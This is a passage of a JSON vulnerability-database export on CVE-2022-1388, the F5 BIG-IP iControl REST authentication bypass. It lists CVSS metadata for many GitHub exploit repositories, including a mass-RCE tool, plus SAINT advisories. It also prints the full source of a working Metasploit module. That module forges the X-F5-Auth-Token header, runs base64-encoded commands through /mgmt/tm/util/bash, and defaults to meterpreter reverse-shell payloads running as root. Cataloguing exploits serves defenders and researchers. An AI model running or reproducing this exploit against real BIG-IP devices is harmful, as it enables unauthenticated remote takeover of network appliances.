"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-05-09T11:30:09", "type": "githubexploit", "title": "Exploit for Missing Authentication for Critical Function in F5 Big-Ip Access Policy Manager", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-1388"], "modified": "2022-06-05T09:11:01", "id": "5FA49DC6-482A-5049-8457-45D3555BF0D5", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2022-05-12T16:59:25", "description": "# CVE-2022-1388\nThis repository conssists of the python exploit ...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-05-11T20:27:36", "type": "githubexploit", "title": "Exploit for Missing Authentication for Critical Function in F5 Big-Ip Access Policy Manager", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-1388"], "modified": "2022-05-11T20:27:59", "id": "28F29C06-FF69-5E55-A2FB-581179E3923A", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2022-06-20T08:00:57", "description": "# F5-CVE-2022-1388-Exploit\nExploit and Check Script for CVE 2022...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-06-20T01:58:40", "type": "githubexploit", "title": "Exploit for Missing Authentication for Critical Function in F5 Big-Ip Access Policy Manager", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-1388"], "modified": "2022-06-20T05:14:08", "id": "136F5B52-10AC-57EC-AFD3-C56855D31685", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2022-05-24T07:25:08", "description": "# CVE-2022-1388-checker\nSimple script realizado en bash, para re...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-05-05T15:25:53", "type": "githubexploit", "title": "Exploit for Missing Authentication for Critical Function in F5 Big-Ip Access Policy Manager", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-1388"], "modified": "2022-05-24T05:24:31", "id": "99C96AE6-0799-5308-B336-961D1EE8E2B4", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2022-05-09T16:09:19", "description": "# CVE-2022-1388-mass rce with multi threading and with list of 1...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-05-09T14:09:49", "type": "githubexploit", "title": "Exploit for Missing Authentication for Critical Function in F5 Big-Ip Access Policy Manager", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-1388"], "modified": "2022-05-09T14:24:04", "id": "EFBD188C-B769-56F0-AEDB-F2809978A507", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2022-06-22T16:36:01", "description": "# CVE-2022-1388\nCVE-2022-1388 is a critical vulnerability (CVSS ...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-05-11T00:15:07", "type": "githubexploit", "title": "Exploit for Missing Authentication for Critical Function in F5 Big-Ip Access Policy Manager", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-1388"], "modified": "2022-06-22T13:24:19", "id": "76A2C7A3-74C3-5ACA-9A55-3FB977E40B38", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2022-05-30T14:03:43", "description": "# F5-CVE-2022-1388-Exploit\nExploit and Check Script for CVE 2022...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-05-28T12:40:56", "type": "githubexploit", "title": "Exploit for Missing Authentication for Critical Function in F5 Big-Ip Access Policy Manager", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-1388"], "modified": "2022-05-28T12:41:07", "id": "C06AD447-C872-5647-832E-D9E87DF0561A", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2022-05-22T15:04:31", "description": "# CVE-2022-1388\nBig-Ip auth bypass and rce\n\n#...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-05-22T12:08:25", "type": "githubexploit", "title": "Exploit for Missing Authentication for Critical Function in F5 Big-Ip Access Policy Manager", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-1388"], "modified": "2022-05-22T12:09:19", "id": "62B12BCA-365B-5124-A855-343665612E53", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2022-06-22T09:09:54", "description": "# F5-BIG-IP exploit\nCVE-2022-1388\nusage: CVE-2022-1388.py [-h] [...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-05-17T03:23:39", "type": "githubexploit", "title": "Exploit for Missing Authentication for Critical Function in F5 Big-Ip Access Policy Manager", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-1388"], "modified": "2022-06-22T06:44:05", "id": "93F2F758-FE27-5C30-9473-F26AD9210871", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2022-05-30T14:10:05", "description": "# CVE-2022-1388-rs\nScanner and Interactive shell for CVE-2022-13...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-05-22T13:27:33", "type": "githubexploit", "title": "Exploit for Missing Authentication for Critical Function in F5 Big-Ip Access Policy Manager", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-1388"], "modified": "2022-05-26T19:00:44", "id": "DDAC4C84-E26E-5729-B325-4ED0A6FF550D", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2022-05-30T14:03:42", "description": "## Vuln Impact\r\n\r\nThis vulnerability may allow an unauthenticate...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-05-28T12:35:59", "type": "githubexploit", "title": "Exploit for Missing Authentication for Critical Function in F5 Big-Ip Access Policy Manager", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-1388"], "modified": "2022-05-28T12:36:10", "id": "1BB783DD-7876-56F2-A6AC-152AF39E064C", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2022-06-26T04:57:41", "description": "## Dorks scan will be available soon. \r\nUnfortunatelly is requir...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-06-24T00:58:37", "type": "githubexploit", "title": "Exploit for Missing Authentication for Critical Function in F5 Big-Ip Access Policy Manager", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-1388"], "modified": "2022-06-26T02:08:51", "id": "A085342C-7F7C-5CBA-A424-89E5B1046F48", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}], "saint": [{"lastseen": "2022-06-20T20:09:43", "description": "Added: 05/13/2022 \nCVE: [CVE-2022-1388](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-1388>) \n\n\n### Background\n\nF5 BIG-IP is a suite of network security products. \n\n### Problem\n\nAn authentication bypass vulnerability in the iControl REST service allows remote attackers to execute arbitrary commands. \n\n### Resolution\n\nUpgrade to one of the fixed versions referenced in [K23605346](<https://support.f5.com/csp/article/K23605346>). \n\n### References\n\n<https://support.f5.com/csp/article/K23605346> \n<https://www.horizon3.ai/f5-icontrol-rest-endpoint-authentication-bypass-technical-deep-dive/> \n\n\n### Platforms\n\nLinux \n \n\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-05-13T00:00:00", "type": "saint", "title": "F5 BIG-IP iControl REST vulnerability", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-1388"], "modified": "2022-05-13T00:00:00", "id": "SAINT:1F156F6EAF49E8162691F7AD93A6F23F", "href": "https://my.saintcorporation.com/cgi-bin/exploit_info/f5_icontrol_rest", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-05-18T10:36:36", "description": "Added: 05/13/2022 \nCVE: [CVE-2022-1388](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-1388>) \n\n\n### Background\n\nF5 BIG-IP is a suite of network security products. \n\n### Problem\n\nAn authentication bypass vulnerability in the iControl REST service allows remote attackers to execute arbitrary commands. \n\n### Resolution\n\nUpgrade to one of the fixed versions referenced in [K23605346](<https://support.f5.com/csp/article/K23605346>). \n\n### References\n\n<https://support.f5.com/csp/article/K23605346> \n<https://www.horizon3.ai/f5-icontrol-rest-endpoint-authentication-bypass-technical-deep-dive/> \n\n\n### Platforms\n\nLinux \n \n\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-05-13T00:00:00", "type": "saint", "title": "F5 BIG-IP iControl REST vulnerability", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-1388"], "modified": "2022-05-13T00:00:00", "id": "SAINT:8205BD2F42401C0064F30BBAC68F4F90", "href": "https://download.saintcorporation.com/cgi-bin/exploit_info/f5_icontrol_rest", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "packetstorm": [{"lastseen": "2022-05-12T16:45:59", "description": "", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-05-12T00:00:00", "type": "packetstorm", "title": "F5 BIG-IP iControl Remote Code Execution", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-1388"], "modified": "2022-05-12T00:00:00", "id": "PACKETSTORM:167150", "href": "https://packetstormsecurity.com/files/167150/F5-BIG-IP-iControl-Remote-Code-Execution.html", "sourceData": "`## \n# This module requires Metasploit: https://metasploit.com/download \n# Current source: https://github.com/rapid7/metasploit-framework \n## \n \nclass MetasploitModule < Msf::Exploit::Remote \nRank = ExcellentRanking \n \ninclude Msf::Exploit::Remote::HttpClient \ninclude Msf::Exploit::CmdStager \nprepend Msf::Exploit::Remote::AutoCheck \n \ndef initialize(info = {}) \nsuper( \nupdate_info( \ninfo, \n'Name' => 'F5 BIG-IP iControl RCE via REST Authentication Bypass', \n'Description' => %q{ \nThis module exploits an authentication bypass vulnerability \nin the F5 BIG-IP iControl REST service to gain access to the \nadmin account, which is capable of executing commands \nthrough the /mgmt/tm/util/bash endpoint. \n \nSuccessful exploitation results in remote code execution \nas the root user. \n}, \n'Author' => [ \n'Heyder Andrade', # Metasploit module \n'alt3kx <alt3kx[at]protonmail.com>', # PoC \n'James Horseman', # Technical Writeup \n'Ron Bowes' # Documentation of exploitation specifics \n], \n'References' => [ \n['CVE', '2022-1388'], \n['URL', 'https://support.f5.com/csp/article/K23605346'], \n['URL', 'https://www.horizon3.ai/f5-icontrol-rest-endpoint-authentication-bypass-technical-deep-dive/'], # Writeup \n['URL', 'https://github.com/alt3kx/CVE-2022-1388_PoC'] # PoC \n], \n'License' => MSF_LICENSE, \n'DisclosureDate' => '2022-05-04', # Vendor advisory \n'Platform' => ['unix', 'linux'], \n'Arch' => [ARCH_CMD, ARCH_X86, ARCH_X64], \n'Privileged' => true, \n'Targets' => [ \n[ \n'Unix Command', \n{ \n'Platform' => 'unix', \n'Arch' => ARCH_CMD, \n'Type' => :unix_cmd, \n'DefaultOptions' => { \n'PAYLOAD' => 'cmd/unix/python/meterpreter/reverse_tcp' \n} \n} \n], \n[ \n'Linux Dropper', \n{ \n'Platform' => 'linux', \n'Arch' => [ARCH_X86, ARCH_X64], \n'Type' => :linux_dropper, \n'DefaultOptions' => { \n'CMDSTAGER::FLAVOR' => :bourne, \n'PAYLOAD' => 'linux/x64/meterpreter/reverse_tcp' \n} \n} \n] \n], \n'DefaultTarget' => 1, # Linux Dropper avoids some timeout issues that Unix Command payloads sometimes encounter. \n'DefaultOptions' => { \n'RPORT' => 443, \n'SSL' => true, \n'PrependFork' => true, # Needed to avoid warnings about timeouts and potential failures across attempts. \n'MeterpreterTryToFork' => true # Needed to avoid warnings about timeouts and potential failures across attempts. \n}, \n'Notes' => { \n'Stability' => [CRASH_SAFE], \n'Reliability' => [REPEATABLE_SESSION], # Only one concurrent session \n'SideEffects' => [ \nIOC_IN_LOGS, # /var/log/restjavad.0.log (rotated) \nARTIFACTS_ON_DISK # CmdStager \n] \n} \n) \n) \n \nregister_options( \n[ \nOptString.new('TARGETURI', [true, 'The base path to the iControl installation', '/']), \nOptString.new('HttpUsername', [true, 'iControl username', 'admin']), \nOptString.new('HttpPassword', [true, 'iControl password', '']) \n] \n) \nregister_advanced_options([ \nOptFloat.new('CmdExecTimeout', [true, 'Command execution timeout', 3.5]) \n]) \nend \n \ndef check \nprint_status(\"Checking #{datastore['RHOST']}:#{datastore['RPORT']}\") \nres = send_request_cgi({ \n'uri' => normalize_uri(target_uri.path, '/mgmt/shared/authn/login'), \n'method' => 'GET' \n}) \n \nreturn CheckCode::Unknown unless res&.code == 401 \n \nbody = res.get_json_document \n \nreturn CheckCode::Safe unless body.key?('message') && body['kind'] == ':resterrorresponse' \n \nsignature = Rex::Text.rand_text_alpha(13) \nstub = \"echo #{signature}\" \nres = send_command(stub) \nreturn CheckCode::Safe unless res&.code == 200 \n \nbody = res.get_json_document \n \nreturn CheckCode::Safe unless body['kind'] == 'tm:util:bash:runstate' \n \nreturn CheckCode::Vulnerable if body['commandResult'].chomp == signature \n \nCheckCode::Safe \nend \n \ndef exploit \nprint_status(\"Executing #{target.name} for #{datastore['PAYLOAD']}\") \n \ncase target['Type'] \nwhen :unix_cmd \nexecute_command(payload.encoded) \nwhen :linux_dropper \nexecute_cmdstager \nend \nend \n \ndef execute_command(cmd, _opts = {}) \nvprint_status(\"Executing command: #{cmd}\") \n \nres = send_command(cmd) \nunless res \nprint_warning('Command execution timed out') \nreturn \nend \n \njson = res.get_json_document \n \nunless res.code == 200 && json['kind'] == 'tm:util:bash:runstate' \nfail_with(Failure::PayloadFailed, 'Failed to execute command') \nend \n \nprint_good('Successfully executed command') \n \nreturn unless (cmd_result = json['commandResult']) \n \nvprint_line(cmd_result) \nend \n \ndef send_command(cmd) \nbash_cmd = \"eval $(echo #{Rex::Text.encode_base64(cmd)} | base64 -d)\" \nsend_request_cgi({ \n'method' => 'POST', \n'uri' => normalize_uri(target_uri.path, '/mgmt/tm/util/bash'), \n'ctype' => 'application/json', \n'authorization' => basic_auth(datastore['HttpUsername'], datastore['HttpPassword']), \n'headers' => { \n'Host' => 'localhost', \n'Connection' => 'keep-alive, X-F5-Auth-Token', \n'X-F5-Auth-Token' => Rex::Text.rand_text_alpha_lower(6) \n}, \n'data' => { \n'command' => 'run', \n'utilCmdArgs' => \"-c '#{bash_cmd}'\" \n}.to_json \n}, datastore['CmdExecTimeout']) \nend \nend \n`\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "sourceHref": "https://packetstormsecurity.com/files/download/167150/f5_icontrol_rce.rb.txt"}, {"lastseen": "2022-05-12T16:46:21", "description": "", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-05-12T00:00:00", "type": "packetstorm", "title": "F5 BIG-IP 16.0.x Remote Code Execution", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", 